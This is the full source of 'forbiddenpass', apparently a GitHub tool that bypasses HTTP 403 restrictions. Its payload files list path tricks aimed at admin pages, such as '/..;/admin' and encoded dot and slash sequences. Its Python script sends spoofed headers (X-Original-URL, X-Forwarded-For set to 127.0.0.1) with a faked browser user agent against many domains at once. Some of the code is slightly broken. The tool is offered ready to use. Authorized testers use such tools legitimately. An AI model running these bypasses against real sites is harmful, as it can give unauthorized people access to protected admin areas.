Repository: gotr00t0day/forbiddenpass
Branch: main
Commit: 6b313649fac2
Files: 5
Total size: 8.7 KB
Directory structure:
gitextract_wioenkpz/
├── README.md
├── admin.txt
├── bypasses.txt
├── forbiddenpass.py
└── requirements.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# UPDATE
Thanks to Knowledge-Wisdom-Understanding (MrPMillz) for making the script cleaner and fixing the header payloads.
# INSTALLATION
```bash
git clone https://github.com/gotr00t0day/forbiddenpass.git
cd forbiddenpass
pip3 install -r requirements.txt
python3 forbiddenpass.py -h
```
# USAGE
```bash
___________ ___. .__ .___ .___ __________
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____\______ \_____ ______ ______
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \| ___/\__ \ / ___// ___/
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \ | / __ \_\___ \ \___ \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /____| (____ /____ >____ >
\/ \/ \/ \/ \/ \/ \/ \/ \/ v1.0
usage: forbiddenpass.py [-h] [-p domain.com] [-d filename.txt] [-t site.com]
optional arguments:
-h, --help show this help message and exit
-p domain.com, --path domain.com
path to check
-d filename.txt, --domains filename.txt
domains to check
-t site.com, --target site.com
domain to check
```
# EXAMPLE
domains to check
```
python3 forbiddenpass.py -d domains.txt
```
domains to check with a path
```
python3 forbiddenpass.py -d domains.txt --path login
```
scan a single target
```
python3 forbiddenpass.py -t https://site
```
scan a single target with a path
```
python3 forbiddenpass.py -t https://site --path login
````
# DISCLAIMER
inspired by https://github.com/iamj0ker/bypass-403 </br>
bypass-403 doesn't support scanning multiple domains and I needed to speed things up a bit so forbiddenpass was created
================================================
FILE: admin.txt
================================================
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
================================================
FILE: bypasses.txt
================================================
/
/%2e/
//.
////
/.//./
/.;/
/%20
/../
%09
%20
%%%%20
%%%%23%%%%3f
%%%%252f%%%%252f
%%%%252f/
%%%%2e%%%%2e
%%%%2e%%%%2e/
%%%%2f
%%%%2f%%%%20%%%%23
================================================
FILE: forbiddenpass.py
================================================
from colorama import Fore, Back, Style
from fake_useragent import UserAgent
import concurrent.futures
import requests
import argparse
import sys
import json
banner = r"""
___________ ___. .__ .___ .___ __________
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____\______ \_____ ______ ______
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \| ___/\__ \ / ___// ___/
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \ | / __ \_\___ \ \___ \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /____| (____ /____ >____ >
\/ \/ \/ \/ \/ \/ \/ \/ \/ v1.1
by c0d3Ninja, MrPMillz
"""
print(Fore.CYAN + banner)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('-p', '--path', action='store',
type=str, help='path to check',
metavar='domain.com')
parser.add_argument('-d', '--domains', action='store',
help="domains to check",
metavar="filename.txt")
parser.add_argument('-t', '--target', action='store',
help="domain to check",
metavar="site.com")
args = parser.parse_args()
ua = UserAgent()
def word_list(wordlist: str) -> list:
try:
with open(wordlist, 'r') as f:
_wordlist = [x.strip() for x in f.readlines()]
return _wordlist
except FileNotFoundError as fnf_err:
print(f"FileNotFoundError: {fnf_err}")
sys.exit(1)
wordlist = word_list("bypasses.txt")
def header_bypass(path=None):
headers = [
{'User-Agent': str(ua.chrome)},
{'User-Agent': str(ua.chrome), 'X-Original-URL': path if path else '/'},
{'User-Agent': str(ua.chrome), 'X-Custom-IP-Authorization': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-For': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-For': '127.0.0.1:80'},
{'User-Agent': str(ua.chrome), 'X-Originally-Forwarded-For': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Originating-': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Originating-IP': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'True-Client-IP': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-WAP-Profile': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Arbitrary': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-HTTP-DestinationURL': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Proto': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'Destination': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Remote-IP': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Client-IP': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Host': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Host': 'http://127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-ProxyUser-Ip': '127.0.0.1'},
{'User-Agent': str(ua.chrome), 'X-rewrite-url': path if path else '/'}
]
return headers
def port_based_bypass(path=None):
headers = [
{'User-Agent': str(ua.chrome)},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '4443'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '80'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8080'},
{'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8443'}
]
def do_request(url: str, stream=False, path=None):
if path:
headers = header_bypass(path=path)
else:
headers = header_bypass()
try:
for header in headers:
if stream:
r = requests.get(url, stream=True, headers=header)
else:
r = requests.get(url, headers=header)
if r.status_code == 200:
print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.GREEN + " [{}]".format(r.status_code))
else:
print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.RED + " [{}]".format(r.status_code))
except requests.exceptions.ConnectionError as ce_error:
pass
except requests.exceptions.Timeout as t_error:
print("Connection Timeout Error: ", t_error)
pass
except requests.exceptions.RequestException as req_err:
print("Some Ambiguous Exception:", req_err)
pass
def main(wordlist):
if args.domains:
if args.path:
print(Fore.CYAN + "Checking domains to bypass....")
checklist = word_list(args.domains)
for lines in checklist:
for bypass in wordlist:
links = lines + "/" + args.path + bypass
do_request(links, stream=True, path=args.path)
else:
print(Fore.CYAN + "Checking domains to bypass....")
checklist = word_list(args.domains)
for lines in checklist:
for bypass in wordlist:
links = lines + bypass
do_request(links, stream=True)
if args.target:
if args.path:
print(Fore.GREEN + f"Checking {args.target}...")
for bypass in wordlist:
links = args.target + "/" + args.path + bypass
do_request(links, path=args.path)
else:
print(Fore.GREEN + f"Checking {args.target}...")
for bypass in wordlist:
links = args.target + bypass
do_request(links)
if __name__ == "__main__":
try:
with concurrent.futures.ThreadPoolExecutor() as executor:
executor.map(main, wordlist)
except KeyboardInterrupt as err:
sys.exit(0)
================================================
FILE: requirements.txt
================================================
colorama
requests
fake-useragent
argparse
gitextract_wioenkpz/ ├── README.md ├── admin.txt ├── bypasses.txt ├── forbiddenpass.py └── requirements.txt
SYMBOL INDEX (5 symbols across 1 files) FILE: forbiddenpass.py function word_list (line 44) | def word_list(wordlist: str) -> list: function header_bypass (line 56) | def header_bypass(path=None): function port_based_bypass (line 81) | def port_based_bypass(path=None): function do_request (line 90) | def do_request(url: str, stream=False, path=None): function main (line 115) | def main(wordlist):
Condensed preview — 5 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (10K chars).
[
{
"path": "README.md",
"chars": 2815,
"preview": "# UPDATE \n\nThanks to Knowledge-Wisdom-Understanding (MrPMillz) for making the script cleaner and fixing the header paylo"
},
{
"path": "admin.txt",
"chars": 94,
"preview": "/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n"
},
{
"path": "bypasses.txt",
"chars": 147,
"preview": "/\n/%2e/\n//.\n////\n/.//./\n/.;/\n/%20\n/../\n%09\n%20\n%%%%20\n%%%%23%%%%3f\n%%%%252f%%%%252f\n%%%%252f/\n%%%%2e%%%%2e\n%%%%2e%%%%2e/"
},
{
"path": "forbiddenpass.py",
"chars": 5845,
"preview": "from colorama import Fore, Back, Style\nfrom fake_useragent import UserAgent\nimport concurrent.futures\nimport requests\nim"
},
{
"path": "requirements.txt",
"chars": 42,
"preview": "colorama\nrequests\nfake-useragent\nargparse\n"
}
]
About this extraction
This page contains the full source code of the gotr00t0day/forbiddenpass GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 5 files (8.7 KB), approximately 2.4k tokens, and a symbol index with 5 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.